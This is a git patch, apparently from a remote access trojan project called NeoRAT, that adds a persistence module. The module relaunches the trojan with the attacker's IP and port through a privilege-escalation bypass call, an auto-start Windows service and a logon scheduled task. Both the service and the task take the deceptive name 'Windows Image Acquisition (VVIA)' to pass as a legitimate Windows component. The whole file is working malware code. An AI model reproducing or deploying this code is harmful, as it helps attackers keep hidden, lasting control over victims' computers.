From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 foreign/client_handling/persistence.py | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 foreign/client_handling/persistence.py

(limited to 'foreign/client_handling/persistence.py')

diff --git a/foreign/client_handling/persistence.py b/foreign/client_handling/persistence.py
new file mode 100644
index 0000000..bc81084
--- /dev/null
+++ b/foreign/client_handling/persistence.py
@@ -0,0 +1,19 @@
+from foreign.privileges.win_privileges import *
+from foreign.utility.terminal_pipe import *
+from foreign.global_state import *
+
+
+def persistence(action_type, extra_data):
+  arguments = f' -ip {state["ip"]} -p {state["port"]}'
+
+  if action_type == 'elevate':
+    return bypass(state['file'], arguments)
+  elif action_type == 'service':
+    try:
+      terminal_pipe(f'sc delete "Windows Image Acquisition (VVIA)"', extra_data[0], extra_data[1])
+    finally:
+      return {'message': terminal_pipe(f'sc create "Windows Image Acquisition (VVIA)" binpath= "{state["file"]}{arguments}" start= "auto"', extra_data[0], extra_data[1])}
+  elif action_type == 'schedule':
+    return {'message': terminal_pipe(f'schtasks /Create /SC ONLOGON /TN "Windows Image Acquisition (VVIA)" /TR "{state["file"]}{arguments}" /F', extra_data[0], extra_data[1])}
+  else:
+    raise Exception('Error message')
\ No newline at end of file
-- 
cgit v1.2.3